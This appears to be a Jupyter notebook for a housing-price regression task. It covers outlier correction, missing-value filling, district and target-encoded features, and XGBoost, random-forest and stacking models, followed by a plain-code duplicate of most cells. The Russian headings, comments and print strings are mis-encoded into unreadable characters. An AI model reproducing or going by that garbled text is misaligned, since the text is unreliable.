>ะัะพะฒะตัะบะฐ ะฝะฐ ะบะพะฝัะธััะตะฝัะฝะพััั
```
train_df[train_df.KitchenSquare > train_df.Square]
```
> ะะฐ ะฒัะฑัะพั ะฟัะธะฝะธะผะฐะตะผ
>1. ะฝะตัััะฐะฝะพะฒะปะตะฝะฝัะต ะทะฝะฐัะตะฝะธั ะธ ะฒัะต ััะพ ะฒััะต q975
>2. <3
ะะพััะตะบัะธั KitchenSquare
```
condition = (train_df['KitchenSquare'].isna()) \
| (train_df['KitchenSquare'] > train_df['KitchenSquare'].quantile(.975))
train_df.loc[condition, 'KitchenSquare'] = train_df['KitchenSquare'].median()
train_df.loc[train_df['KitchenSquare'] < 3, 'KitchenSquare'] = 3
train_df['KitchenSquare'].value_counts()
```
>ะะพะฒัะพัะฝะฐั ะฟัะพะฒะตัะบะฐ ะฝะฐ ะบะพะฝัะธััะตะฝัะฝะพััั
```
train_df[train_df.KitchenSquare > train_df.Square]
```
**HouseFloor, Floor**
```
train_df['HouseFloor'].sort_values().unique()
train_df['Floor'].sort_values().unique()
(train_df['Floor'] > train_df['HouseFloor']).sum()
```
> ะะฐ ะฐะฝะพะผะฐะปะธะธ ะฟัะธะฝะธะผะฐะตะผ
> Floor>HouseFloor
> Floor=0
```
train_df['HouseFloor_outlier'] = 0
train_df.loc[train_df['HouseFloor'] == 0, 'HouseFloor_outlier'] = 1
train_df.loc[train_df['Floor'] > train_df['HouseFloor'], 'HouseFloor_outlier'] = 1
train_df.loc[train_df['HouseFloor'] == 0, 'HouseFloor'] = train_df['HouseFloor'].median()
floor_outliers = train_df.loc[train_df['Floor'] > train_df['HouseFloor']].index
floor_outliers
```
> ะณะตะฝะตัะฐัะธั ะฟัะธะทะฝะฐะบะฐ Floor ะฒ ะฟัะตะดะตะปะฐั
[1, HouseFloor]
```
train_df.loc[floor_outliers, 'Floor'] = train_df.loc[floor_outliers, 'HouseFloor']\
.apply(lambda x: random.randint(1, x))
(train_df['Floor'] > train_df['HouseFloor']).sum()
```
**HouseYear**
```
train_df['HouseYear'].sort_values(ascending=False)
train_df[train_df['HouseYear'] > 2020]
train_df.loc[train_df['HouseYear'] > 2020, 'HouseYear'] = 2020
```
### 3. ะะฑัะฐะฑะพัะบะฐ ะฟัะพะฟััะบะพะฒ <a class='anchor' id='nan'>
```
train_df.isna().sum()
```
>ะฟัะพะฟััะบะธ ะฒ LifeSquare ะธ Healthcare_1
```
train_df[['Square', 'LifeSquare', 'KitchenSquare']].head(10)
```
**LifeSquare**
> ะคะธะบัะฐัะธั ะฟัะพะฑะตะปะพะฒ
```
train_df['LifeSquare_nan'] = train_df['LifeSquare'].isna() * 1
```
> ะะพััะตะบัะธั LifeSquare=Square-KitchenSquare-3
```
condition = (train_df['LifeSquare'].isna()) \
& (~train_df['Square'].isna()) \
& (~train_df['KitchenSquare'].isna())
train_df.loc[condition, 'LifeSquare'] = train_df.loc[condition, 'Square'] \
- train_df.loc[condition, 'KitchenSquare'] - 3
```
**Healthcare_1**
>ะัะธะทะฝะฐะบ Healthcare_1 ะธะผะตะตะตั ะผะฝะพะณะพ ะฟัะพะฟััะบะพะฒ (50%) ะธ ะตะณะพ ะปะพะณะธะบะฐ ะพัััััะฒัะตั, ะฒะพัััะฐะฝะพะฒะปะตะฝะธะต ะฝะต ะฒะพะทะผะพะถะฝะพ. ะะพะทะผะพะถะฝะพ ะฟะพััะตะฑัะตััั ัะดะฐะปะตะฝะธะต.
```
train_df.Healthcare_1.isna().sum(), train_df.shape[0]
train_df.drop('Healthcare_1', axis=1, inplace=True)
class DataPreprocessing:
"""ะะพะดะณะพัะพะฒะบะฐ ะธัั
ะพะดะฝัั
ะดะฐะฝะฝัั
"""
def __init__(self):
"""ะะฐัะฐะผะตััั ะบะปะฐััะฐ"""
self.medians=None
self.kitchen_square_quantile = None
def fit(self, X):
"""ะกะพั
ัะฐะฝะตะฝะธะต ััะฐัะธััะธะบ"""
# ะ ะฐััะตั ะผะตะดะธะฐะฝ
self.medians = X.median()
self.kitchen_square_quantile = X['KitchenSquare'].quantile(.975)
def transform(self, X):
"""ะขัะฐะฝััะพัะผะฐัะธั ะดะฐะฝะฝัั
"""
# Rooms
X['Rooms_outlier'] = 0
X.loc[(X['Rooms'] == 0) | (X['Rooms'] >= 6), 'Rooms_outlier'] = 1
X.loc[X['Rooms'] == 0, 'Rooms'] = 1
X.loc[X['Rooms'] >= 6, 'Rooms'] = self.medians['Rooms']
# KitchenSquare
condition = (X['KitchenSquare'].isna()) \
| (X['KitchenSquare'] > self.kitchen_square_quantile)
X.loc[condition, 'KitchenSquare'] = self.medians['KitchenSquare']
X.loc[X['KitchenSquare'] < 3, 'KitchenSquare'] = 3
# HouseFloor, Floor
X['HouseFloor_outlier'] = 0
X.loc[X['HouseFloor'] == 0, 'HouseFloor_outlier'] = 1
X.loc[X['Floor'] > X['HouseFloor'], 'HouseFloor_outlier'] = 1
X.loc[X['HouseFloor'] == 0, 'HouseFloor'] = self.medians['HouseFloor']
floor_outliers = X.loc[X['Floor'] > X['HouseFloor']].index
X.loc[floor_outliers, 'Floor'] = X.loc[floor_outliers, 'HouseFloor']\
.apply(lambda x: random.randint(1, x))
# HouseYear
current_year = datetime.now().year
X['HouseYear_outlier'] = 0
X.loc[X['HouseYear'] > current_year, 'HouseYear_outlier'] = 1
X.loc[X['HouseYear'] > current_year, 'HouseYear'] = current_year
# Healthcare_1
if 'Healthcare_1' in X.columns:
X.drop('Healthcare_1', axis=1, inplace=True)
# LifeSquare
X['LifeSquare_nan'] = X['LifeSquare'].isna() * 1
condition = (X['LifeSquare'].isna()) & \
(~X['Square'].isna()) & \
(~X['KitchenSquare'].isna())
X.loc[condition, 'LifeSquare'] = X.loc[condition, 'Square'] - X.loc[condition, 'KitchenSquare'] - 3
X.fillna(self.medians, inplace=True)
return X
```
### 4. ะะพัััะพะตะฝะธะต ะฝะพะฒัั
ะฟัะธะทะฝะฐะบะพะฒ <a class='anchor' id='feature'>
**Dummies**
>ะัะตะพะฑัะฐะทะพะฒะฐะฝะธะต ัััะพะบะพะฒัั
ะฒ int
```
train_df[['Ecology_2', 'Ecology_3', 'Shops_2']]
binary_to_numbers = {'A': 0, 'B': 1}
train_df['Ecology_2'] = train_df['Ecology_2'].replace(binary_to_numbers)
train_df['Ecology_3'] = train_df['Ecology_3'].replace(binary_to_numbers)
train_df['Shops_2'] = train_df['Shops_2'].replace(binary_to_numbers)
train_df[['Ecology_2', 'Ecology_3', 'Shops_2']]
```
**DistrictSize, IsDistrictLarge**
```
district_size = train_df['DistrictId'].value_counts().reset_index()\
.rename(columns={'index':'DistrictId', 'DistrictId':'DistrictSize'})
district_size.head()
train_df = train_df.merge(district_size, on='DistrictId', how='left')
train_df.head()
(train_df['DistrictSize'] > 100).value_counts()
train_df['IsDistrictLarge'] = (train_df['DistrictSize'] > 100).astype(int)
```
**MedPriceByDistrict**
```
med_price_by_district = train_df.groupby(['DistrictId', 'Rooms'], as_index=False).agg({'Price':'median'})\
.rename(columns={'Price':'MedPriceByDistrict'})
med_price_by_district.head()
train_df = train_df.merge(med_price_by_district, on=['DistrictId', 'Rooms'], how='left')
train_df.head()
```
**MedPriceByFloorYear**
```
def floor_to_cat(X):
X['floor_cat'] = 0
X.loc[X['Floor'] <= 3, 'floor_cat'] = 1
X.loc[(X['Floor'] > 3) & (X['Floor'] <= 5), 'floor_cat'] = 2
X.loc[(X['Floor'] > 5) & (X['Floor'] <= 9), 'floor_cat'] = 3
X.loc[(X['Floor'] > 9) & (X['Floor'] <= 15), 'floor_cat'] = 4
X.loc[X['Floor'] > 15, 'floor_cat'] = 5
return X
def floor_to_cat_pandas(X):
bins = [0, 3, 5, 9, 15, X['Floor'].max()]
X['floor_cat'] = pd.cut(X['Floor'], bins=bins, labels=False)
X['floor_cat'].fillna(-1, inplace=True)
return X
def year_to_cat(X):
X['year_cat'] = 0
X.loc[X['HouseYear'] <= 1941, 'year_cat'] = 1
X.loc[(X['HouseYear'] > 1941) & (X['HouseYear'] <= 1945), 'year_cat'] = 2
X.loc[(X['HouseYear'] > 1945) & (X['HouseYear'] <= 1980), 'year_cat'] = 3
X.loc[(X['HouseYear'] > 1980) & (X['HouseYear'] <= 2000), 'year_cat'] = 4
X.loc[(X['HouseYear'] > 2000) & (X['HouseYear'] <= 2010), 'year_cat'] = 5
X.loc[(X['HouseYear'] > 2010), 'year_cat'] = 6
return X
def year_to_cat_pandas(X):
bins = [0, 1941, 1945, 1980, 2000, 2010, X['HouseYear'].max()]
X['year_cat'] = pd.cut(X['HouseYear'], bins=bins, labels=False)
X['year_cat'].fillna(-1, inplace=True)
return X
bins = [0, 3, 5, 9, 15, train_df['Floor'].max()]
pd.cut(train_df['Floor'], bins=bins, labels=False)
bins = [0, 3, 5, 9, 15, train_df['Floor'].max()]
pd.cut(train_df['Floor'], bins=bins)
train_df = year_to_cat(train_df)
train_df = floor_to_cat(train_df)
train_df.head()
med_price_by_floor_year = train_df.groupby(['year_cat', 'floor_cat'], as_index=False).agg({'Price':'median'}).\
rename(columns={'Price':'MedPriceByFloorYear'})
med_price_by_floor_year.head()
train_df = train_df.merge(med_price_by_floor_year, on=['year_cat', 'floor_cat'], how='left')
train_df.head()
class FeatureGenetator():
"""ะะตะฝะตัะฐัะธั ะฝะพะฒัั
ัะธั"""
def __init__(self):
self.DistrictId_counts = None
self.binary_to_numbers = None
self.med_price_by_district = None
self.med_price_by_floor_year = None
self.house_year_max = None
self.floor_max = None
def fit(self, X, y=None):
X = X.copy()
# Binary features
self.binary_to_numbers = {'A': 0, 'B': 1}
# DistrictID
self.district_size = X['DistrictId'].value_counts().reset_index() \
.rename(columns={'index':'DistrictId', 'DistrictId':'DistrictSize'})
# Target encoding
## District, Rooms
df = X.copy()
if y is not None:
df['Price'] = y.values
self.med_price_by_district = df.groupby(['DistrictId', 'Rooms'], as_index=False).agg({'Price':'median'})\
.rename(columns={'Price':'MedPriceByDistrict'})
self.med_price_by_district_median = self.med_price_by_district['MedPriceByDistrict'].median()
## floor, year
if y is not None:
self.floor_max = df['Floor'].max()
self.house_year_max = df['HouseYear'].max()
df['Price'] = y.values
df = self.floor_to_cat(df)
df = self.year_to_cat(df)
self.med_price_by_floor_year = df.groupby(['year_cat', 'floor_cat'], as_index=False).agg({'Price':'median'}).\
rename(columns={'Price':'MedPriceByFloorYear'})
self.med_price_by_floor_year_median = self.med_price_by_floor_year['MedPriceByFloorYear'].median()
def transform(self, X):
# Binary features
X['Ecology_2'] = X['Ecology_2'].map(self.binary_to_numbers) # self.binary_to_numbers = {'A': 0, 'B': 1}
X['Ecology_3'] = X['Ecology_3'].map(self.binary_to_numbers)
X['Shops_2'] = X['Shops_2'].map(self.binary_to_numbers)
# DistrictId, IsDistrictLarge
X = X.merge(self.district_size, on='DistrictId', how='left')
X['new_district'] = 0
X.loc[X['DistrictSize'].isna(), 'new_district'] = 1
X['DistrictSize'].fillna(5, inplace=True)
X['IsDistrictLarge'] = (X['DistrictSize'] > 100).astype(int)
# More categorical features
X = self.floor_to_cat(X) # + ััะพะปะฑะตั floor_cat
X = self.year_to_cat(X) # + ััะพะปะฑะตั year_cat
# Target encoding
if self.med_price_by_district is not None:
X = X.merge(self.med_price_by_district, on=['DistrictId', 'Rooms'], how='left')
X.fillna(self.med_price_by_district_median, inplace=True)
if self.med_price_by_floor_year is not None:
X = X.merge(self.med_price_by_floor_year, on=['year_cat', 'floor_cat'], how='left')
X.fillna(self.med_price_by_floor_year_median, inplace=True)
return X
def floor_to_cat(self, X):
bins = [0, 3, 5, 9, 15, self.floor_max]
X['floor_cat'] = pd.cut(X['Floor'], bins=bins, labels=False)
X['floor_cat'].fillna(-1, inplace=True)
return X
def year_to_cat(self, X):
bins = [0, 1941, 1945, 1980, 2000, 2010, self.house_year_max]
X['year_cat'] = pd.cut(X['HouseYear'], bins=bins, labels=False)
X['year_cat'].fillna(-1, inplace=True)
return X
```
### 5. ะัะฑะพั ะฟัะธะทะฝะฐะบะพะฒ <a class='anchor' id='feature_selection'>
```
train_df.columns.tolist()
feature_names = ['Rooms', 'Square', 'LifeSquare', 'KitchenSquare', 'Floor', 'HouseFloor', 'HouseYear',
'Ecology_1', 'Ecology_2', 'Ecology_3', 'Social_1', 'Social_2', 'Social_3',
'Helthcare_2', 'Shops_1', 'Shops_2']
new_feature_names = ['Rooms_outlier', 'HouseFloor_outlier', 'HouseYear_outlier', 'LifeSquare_nan', 'DistrictSize',
'new_district', 'IsDistrictLarge', 'MedPriceByDistrict', 'MedPriceByFloorYear']
target_name = 'Price'
```
### 6. ะ ะฐะทะฑะธะตะฝะธะต ะฝะฐ train ะธ test <a class='anchor' id='split'>
```
train_df = pd.read_csv(TRAIN_DATASET_PATH)
test_df = pd.read_csv(TEST_DATASET_PATH)
X = train_df.drop(columns=target_name)
y = train_df[target_name]
X_train, X_valid, y_train, y_valid = train_test_split(X, y, test_size=0.33, shuffle=True, random_state=21)
preprocessor = DataPreprocessing()
preprocessor.fit(X_train)
X_train = preprocessor.transform(X_train)
X_valid = preprocessor.transform(X_valid)
test_df = preprocessor.transform(test_df)
X_train.shape, X_valid.shape, test_df.shape
features_gen = FeatureGenetator()
features_gen.fit(X_train, y_train)
X_train = features_gen.transform(X_train)
X_valid = features_gen.transform(X_valid)
test_df = features_gen.transform(test_df)
X_train.shape, X_valid.shape, test_df.shape
X_train = X_train[feature_names + new_feature_names]
X_valid = X_valid[feature_names + new_feature_names]
test_df = test_df[feature_names + new_feature_names]
X_train.isna().sum().sum(), X_valid.isna().sum().sum(), test_df.isna().sum().sum()
```
### 7. ะะพัััะพะตะฝะธะต ะผะพะดะตะปะธ <a class='anchor' id='modeling'>
**ะะฑััะตะฝะธะต**
**xgboost**
```
import xgboost as xgb
from xgboost_autotune import fit_parameters
from sklearn.metrics import make_scorer, accuracy_score
best_xgb_model = xgb.XGBRegressor(colsample_bytree=0.4,
gamma=0,
learning_rate=0.08,
max_depth=8,
min_child_weight=1.5,
# 10000
n_estimators=300,
reg_alpha=0.75,
reg_lambda=0.45,
subsample=0.6,
seed=42)
best_xgb_model.fit(X_train,y_train)
y_train_preds = best_xgb_model.predict(X_train)
y_test_preds = best_xgb_model.predict(X_valid)
evaluate_preds(y_train, y_train_preds, y_valid, y_test_preds)
```
**RandomForestRegressor**
```
rf_model = RandomForestRegressor(random_state=21, criterion='mse')
rf_model.fit(X_train, y_train)
```
**ะัะตะฝะบะฐ ะผะพะดะตะปะธ**
```
y_train_preds = rf_model.predict(X_train)
y_test_preds = rf_model.predict(X_valid)
evaluate_preds(y_train, y_train_preds, y_valid, y_test_preds)
```
**ะัะพัั-ะฒะฐะปะธะดะฐัะธั**
```
cv_score = cross_val_score(rf_model, X_train, y_train, scoring='r2', cv=KFold(n_splits=3, shuffle=True, random_state=21))
cv_score
cv_score.mean()
```
**ะะฐะถะฝะพััั ะฟัะธะทะฝะฐะบะพะฒ**
```
feature_importances = pd.DataFrame(list(zip(X_train.columns, rf_model.feature_importances_)),
columns=['feature_name', 'importance'])
feature_importances.sort_values(by='importance', ascending=False)
```
ะะดะตั ะฑะพะปะตะต ัะปะพะถะฝัั
ะผะพะดะตะปะตะน:
```
from sklearn.ensemble import StackingRegressor, VotingRegressor, BaggingRegressor, GradientBoostingRegressor
from sklearn.linear_model import LinearRegression
lr = LinearRegression()
gb = GradientBoostingRegressor()
stack = StackingRegressor([('lr', lr), ('rf', rf_model)], final_estimator=gb)
stack.fit(X_train, y_train)
y_train_preds = stack.predict(X_train)
y_test_preds = stack.predict(X_valid)
evaluate_preds(y_train, y_train_preds, y_valid, y_test_preds)
```
### 8. ะัะพะณะฝะพะทะธัะพะฒะฐะฝะธะต ะฝะฐ ัะตััะพะฒะพะผ ะดะฐัะฐัะตัะต <a class='anchor' id='prediction'>
1. ะัะฟะพะปะฝะธัั ะดะปั ัะตััะพะฒะพะณะพ ะดะฐัะฐัะตัะฐ ัะต ะถะต ััะฐะฟั ะพะฑัะฐะฑะพัะบะธ ะธ ะฟะพัััะพะฝะธัะฝะธั ะฟัะธะทะฝะฐะบะพะฒ
2. ะะต ะฟะพัะตัััั ะธ ะฝะต ะฟะตัะตะผะตัะฐัั ะธะฝะดะตะบัั ะพั ะฟัะธะผะตัะพะฒ ะฟัะธ ะฟะพัััะพะตะฝะธะธ ะฟัะพะณะฝะพะทะพะฒ
3. ะัะพะณะฝะพะทั ะดะพะปะถะฝั ะฑััั ะดะปั ะฒัะต ะฟัะธะผะตัะพะฒ ะธะท ัะตััะพะฒะพะณะพ ะดะฐัะฐัะตัะฐ (ะดะปั ะฒัะตั
ัััะพะบ)
```
test_df.shape
test_df
submit = pd.read_csv('sample_submission.csv')
submit.head()
best_xgb_model
# predictions = rf_model.predict(test_df)
predictions = best_xgb_model.predict(test_df)
predictions
submit['Price'] = predictions
submit.head()
submit.to_csv('rf_submit.csv', index=False)
```
|
github_jupyter
|
import numpy as np
import pandas as pd
import random
from sklearn.model_selection import train_test_split, cross_val_score
from sklearn.preprocessing import StandardScaler, RobustScaler
from sklearn.ensemble import RandomForestRegressor
from sklearn.metrics import r2_score as r2
from sklearn.model_selection import KFold, GridSearchCV
from datetime import datetime
import matplotlib
import matplotlib.pyplot as plt
import seaborn as sns
%matplotlib inline
import warnings
warnings.filterwarnings('ignore')
matplotlib.rcParams.update({'font.size': 14})
def evaluate_preds(train_true_values, train_pred_values, test_true_values, test_pred_values):
print("Train R2:\t" + str(round(r2(train_true_values, train_pred_values), 3)))
print("Test R2:\t" + str(round(r2(test_true_values, test_pred_values), 3)))
plt.figure(figsize=(18,10))
plt.subplot(121)
sns.scatterplot(x=train_pred_values, y=train_true_values)
plt.xlabel('Predicted values')
plt.ylabel('True values')
plt.title('Train sample prediction')
plt.subplot(122)
sns.scatterplot(x=test_pred_values, y=test_true_values)
plt.xlabel('Predicted values')
plt.ylabel('True values')
plt.title('Test sample prediction')
plt.show()
TRAIN_DATASET_PATH = 'train.csv'
TEST_DATASET_PATH = 'test.csv'
train_df = pd.read_csv(TRAIN_DATASET_PATH)
train_df.tail()
train_df.dtypes
test_df = pd.read_csv(TEST_DATASET_PATH)
test_df.tail()
print('ะกััะพะบ ะฒ ััะตะฝะธัะพะฒะพัะฝะพะผ ะฝะฐะฑะพัะต :\t', train_df.shape[0])
print('ะกััะพะบ ะฒ ัะตััะพะฒะพะผ ะฝะฐะฑะพัะต :\t', test_df.shape[0])
train_df.shape[1] - 1 == test_df.shape[1]
train_df.dtypes
train_df['Id'] = train_df['Id'].astype(str)
#train_df['DistrictId'] = train_df['DistrictId'].astype(str)
train_df.Price.describe()
plt.figure(figsize = (16, 8))
train_df['Price'].hist(bins=30)
plt.ylabel('Count')
plt.xlabel('Price')
plt.title('Target distribution')
plt.show()
train_df.describe()
train_df.select_dtypes(include='object').columns.tolist()
train_df['DistrictId'].value_counts()
train_df['Ecology_2'].value_counts()
train_df['Ecology_3'].value_counts()
train_df['Shops_2'].value_counts()
train_df['Rooms'].value_counts()
train_df[train_df['Rooms'] == 0]
train_df['Rooms_outlier'] = 0
train_df.loc[(train_df['Rooms'] == 0) | (train_df['Rooms'] >= 6), 'Rooms_outlier'] = 1
train_df.head()
train_df[train_df['Rooms'] > 6 ]
train_df.loc[train_df['Rooms'] == 0, 'Rooms'] = 1
train_df.loc[train_df['Rooms'] >= 6, 'Rooms'] = train_df['Rooms'].median()
train_df['Rooms'].value_counts()
train_df['KitchenSquare'].value_counts()
train_df['KitchenSquare'].quantile(.975), train_df['KitchenSquare'].quantile(.025)
train_df[train_df.KitchenSquare > train_df.Square]
condition = (train_df['KitchenSquare'].isna()) \
| (train_df['KitchenSquare'] > train_df['KitchenSquare'].quantile(.975))
train_df.loc[condition, 'KitchenSquare'] = train_df['KitchenSquare'].median()
train_df.loc[train_df['KitchenSquare'] < 3, 'KitchenSquare'] = 3
train_df['KitchenSquare'].value_counts()
train_df[train_df.KitchenSquare > train_df.Square]
train_df['HouseFloor'].sort_values().unique()
train_df['Floor'].sort_values().unique()
(train_df['Floor'] > train_df['HouseFloor']).sum()
train_df['HouseFloor_outlier'] = 0
train_df.loc[train_df['HouseFloor'] == 0, 'HouseFloor_outlier'] = 1
train_df.loc[train_df['Floor'] > train_df['HouseFloor'], 'HouseFloor_outlier'] = 1
train_df.loc[train_df['HouseFloor'] == 0, 'HouseFloor'] = train_df['HouseFloor'].median()
floor_outliers = train_df.loc[train_df['Floor'] > train_df['HouseFloor']].index
floor_outliers
train_df.loc[floor_outliers, 'Floor'] = train_df.loc[floor_outliers, 'HouseFloor']\
.apply(lambda x: random.randint(1, x))
(train_df['Floor'] > train_df['HouseFloor']).sum()
train_df['HouseYear'].sort_values(ascending=False)
train_df[train_df['HouseYear'] > 2020]
train_df.loc[train_df['HouseYear'] > 2020, 'HouseYear'] = 2020
train_df.isna().sum()
train_df[['Square', 'LifeSquare', 'KitchenSquare']].head(10)
train_df['LifeSquare_nan'] = train_df['LifeSquare'].isna() * 1
condition = (train_df['LifeSquare'].isna()) \
& (~train_df['Square'].isna()) \
& (~train_df['KitchenSquare'].isna())
train_df.loc[condition, 'LifeSquare'] = train_df.loc[condition, 'Square'] \
- train_df.loc[condition, 'KitchenSquare'] - 3
train_df.Healthcare_1.isna().sum(), train_df.shape[0]
train_df.drop('Healthcare_1', axis=1, inplace=True)
class DataPreprocessing:
"""ะะพะดะณะพัะพะฒะบะฐ ะธัั
ะพะดะฝัั
ะดะฐะฝะฝัั
"""
def __init__(self):
"""ะะฐัะฐะผะตััั ะบะปะฐััะฐ"""
self.medians=None
self.kitchen_square_quantile = None
def fit(self, X):
"""ะกะพั
ัะฐะฝะตะฝะธะต ััะฐัะธััะธะบ"""
# ะ ะฐััะตั ะผะตะดะธะฐะฝ
self.medians = X.median()
self.kitchen_square_quantile = X['KitchenSquare'].quantile(.975)
def transform(self, X):
"""ะขัะฐะฝััะพัะผะฐัะธั ะดะฐะฝะฝัั
"""
# Rooms
X['Rooms_outlier'] = 0
X.loc[(X['Rooms'] == 0) | (X['Rooms'] >= 6), 'Rooms_outlier'] = 1
X.loc[X['Rooms'] == 0, 'Rooms'] = 1
X.loc[X['Rooms'] >= 6, 'Rooms'] = self.medians['Rooms']
# KitchenSquare
condition = (X['KitchenSquare'].isna()) \
| (X['KitchenSquare'] > self.kitchen_square_quantile)
X.loc[condition, 'KitchenSquare'] = self.medians['KitchenSquare']
X.loc[X['KitchenSquare'] < 3, 'KitchenSquare'] = 3
# HouseFloor, Floor
X['HouseFloor_outlier'] = 0
X.loc[X['HouseFloor'] == 0, 'HouseFloor_outlier'] = 1
X.loc[X['Floor'] > X['HouseFloor'], 'HouseFloor_outlier'] = 1
X.loc[X['HouseFloor'] == 0, 'HouseFloor'] = self.medians['HouseFloor']
floor_outliers = X.loc[X['Floor'] > X['HouseFloor']].index
X.loc[floor_outliers, 'Floor'] = X.loc[floor_outliers, 'HouseFloor']\
.apply(lambda x: random.randint(1, x))
# HouseYear
current_year = datetime.now().year
X['HouseYear_outlier'] = 0
X.loc[X['HouseYear'] > current_year, 'HouseYear_outlier'] = 1
X.loc[X['HouseYear'] > current_year, 'HouseYear'] = current_year
# Healthcare_1
if 'Healthcare_1' in X.columns:
X.drop('Healthcare_1', axis=1, inplace=True)
# LifeSquare
X['LifeSquare_nan'] = X['LifeSquare'].isna() * 1
condition = (X['LifeSquare'].isna()) & \
(~X['Square'].isna()) & \
(~X['KitchenSquare'].isna())
X.loc[condition, 'LifeSquare'] = X.loc[condition, 'Square'] - X.loc[condition, 'KitchenSquare'] - 3
X.fillna(self.medians, inplace=True)
return X
train_df[['Ecology_2', 'Ecology_3', 'Shops_2']]
binary_to_numbers = {'A': 0, 'B': 1}
train_df['Ecology_2'] = train_df['Ecology_2'].replace(binary_to_numbers)
train_df['Ecology_3'] = train_df['Ecology_3'].replace(binary_to_numbers)
train_df['Shops_2'] = train_df['Shops_2'].replace(binary_to_numbers)
train_df[['Ecology_2', 'Ecology_3', 'Shops_2']]
district_size = train_df['DistrictId'].value_counts().reset_index()\
.rename(columns={'index':'DistrictId', 'DistrictId':'DistrictSize'})
district_size.head()
train_df = train_df.merge(district_size, on='DistrictId', how='left')
train_df.head()
(train_df['DistrictSize'] > 100).value_counts()
train_df['IsDistrictLarge'] = (train_df['DistrictSize'] > 100).astype(int)
med_price_by_district = train_df.groupby(['DistrictId', 'Rooms'], as_index=False).agg({'Price':'median'})\
.rename(columns={'Price':'MedPriceByDistrict'})
med_price_by_district.head()
train_df = train_df.merge(med_price_by_district, on=['DistrictId', 'Rooms'], how='left')
train_df.head()
def floor_to_cat(X):
X['floor_cat'] = 0
X.loc[X['Floor'] <= 3, 'floor_cat'] = 1
X.loc[(X['Floor'] > 3) & (X['Floor'] <= 5), 'floor_cat'] = 2
X.loc[(X['Floor'] > 5) & (X['Floor'] <= 9), 'floor_cat'] = 3
X.loc[(X['Floor'] > 9) & (X['Floor'] <= 15), 'floor_cat'] = 4
X.loc[X['Floor'] > 15, 'floor_cat'] = 5
return X
def floor_to_cat_pandas(X):
bins = [0, 3, 5, 9, 15, X['Floor'].max()]
X['floor_cat'] = pd.cut(X['Floor'], bins=bins, labels=False)
X['floor_cat'].fillna(-1, inplace=True)
return X
def year_to_cat(X):
X['year_cat'] = 0
X.loc[X['HouseYear'] <= 1941, 'year_cat'] = 1
X.loc[(X['HouseYear'] > 1941) & (X['HouseYear'] <= 1945), 'year_cat'] = 2
X.loc[(X['HouseYear'] > 1945) & (X['HouseYear'] <= 1980), 'year_cat'] = 3
X.loc[(X['HouseYear'] > 1980) & (X['HouseYear'] <= 2000), 'year_cat'] = 4
X.loc[(X['HouseYear'] > 2000) & (X['HouseYear'] <= 2010), 'year_cat'] = 5
X.loc[(X['HouseYear'] > 2010), 'year_cat'] = 6
return X
def year_to_cat_pandas(X):
bins = [0, 1941, 1945, 1980, 2000, 2010, X['HouseYear'].max()]
X['year_cat'] = pd.cut(X['HouseYear'], bins=bins, labels=False)
X['year_cat'].fillna(-1, inplace=True)
return X
bins = [0, 3, 5, 9, 15, train_df['Floor'].max()]
pd.cut(train_df['Floor'], bins=bins, labels=False)
bins = [0, 3, 5, 9, 15, train_df['Floor'].max()]
pd.cut(train_df['Floor'], bins=bins)
train_df = year_to_cat(train_df)
train_df = floor_to_cat(train_df)
train_df.head()
med_price_by_floor_year = train_df.groupby(['year_cat', 'floor_cat'], as_index=False).agg({'Price':'median'}).\
rename(columns={'Price':'MedPriceByFloorYear'})
med_price_by_floor_year.head()
train_df = train_df.merge(med_price_by_floor_year, on=['year_cat', 'floor_cat'], how='left')
train_df.head()
class FeatureGenetator():
"""ะะตะฝะตัะฐัะธั ะฝะพะฒัั
ัะธั"""
def __init__(self):
self.DistrictId_counts = None
self.binary_to_numbers = None
self.med_price_by_district = None
self.med_price_by_floor_year = None
self.house_year_max = None
self.floor_max = None
def fit(self, X, y=None):
X = X.copy()
# Binary features
self.binary_to_numbers = {'A': 0, 'B': 1}
# DistrictID
self.district_size = X['DistrictId'].value_counts().reset_index() \
.rename(columns={'index':'DistrictId', 'DistrictId':'DistrictSize'})
# Target encoding
## District, Rooms
df = X.copy()
if y is not None:
df['Price'] = y.values
self.med_price_by_district = df.groupby(['DistrictId', 'Rooms'], as_index=False).agg({'Price':'median'})\
.rename(columns={'Price':'MedPriceByDistrict'})
self.med_price_by_district_median = self.med_price_by_district['MedPriceByDistrict'].median()
## floor, year
if y is not None:
self.floor_max = df['Floor'].max()
self.house_year_max = df['HouseYear'].max()
df['Price'] = y.values
df = self.floor_to_cat(df)
df = self.year_to_cat(df)
self.med_price_by_floor_year = df.groupby(['year_cat', 'floor_cat'], as_index=False).agg({'Price':'median'}).\
rename(columns={'Price':'MedPriceByFloorYear'})
self.med_price_by_floor_year_median = self.med_price_by_floor_year['MedPriceByFloorYear'].median()
def transform(self, X):
# Binary features
X['Ecology_2'] = X['Ecology_2'].map(self.binary_to_numbers) # self.binary_to_numbers = {'A': 0, 'B': 1}
X['Ecology_3'] = X['Ecology_3'].map(self.binary_to_numbers)
X['Shops_2'] = X['Shops_2'].map(self.binary_to_numbers)
# DistrictId, IsDistrictLarge
X = X.merge(self.district_size, on='DistrictId', how='left')
X['new_district'] = 0
X.loc[X['DistrictSize'].isna(), 'new_district'] = 1
X['DistrictSize'].fillna(5, inplace=True)
X['IsDistrictLarge'] = (X['DistrictSize'] > 100).astype(int)
# More categorical features
X = self.floor_to_cat(X) # + ััะพะปะฑะตั floor_cat
X = self.year_to_cat(X) # + ััะพะปะฑะตั year_cat
# Target encoding
if self.med_price_by_district is not None:
X = X.merge(self.med_price_by_district, on=['DistrictId', 'Rooms'], how='left')
X.fillna(self.med_price_by_district_median, inplace=True)
if self.med_price_by_floor_year is not None:
X = X.merge(self.med_price_by_floor_year, on=['year_cat', 'floor_cat'], how='left')
X.fillna(self.med_price_by_floor_year_median, inplace=True)
return X
def floor_to_cat(self, X):
bins = [0, 3, 5, 9, 15, self.floor_max]
X['floor_cat'] = pd.cut(X['Floor'], bins=bins, labels=False)
X['floor_cat'].fillna(-1, inplace=True)
return X
def year_to_cat(self, X):
bins = [0, 1941, 1945, 1980, 2000, 2010, self.house_year_max]
X['year_cat'] = pd.cut(X['HouseYear'], bins=bins, labels=False)
X['year_cat'].fillna(-1, inplace=True)
return X
train_df.columns.tolist()
feature_names = ['Rooms', 'Square', 'LifeSquare', 'KitchenSquare', 'Floor', 'HouseFloor', 'HouseYear',
'Ecology_1', 'Ecology_2', 'Ecology_3', 'Social_1', 'Social_2', 'Social_3',
'Helthcare_2', 'Shops_1', 'Shops_2']
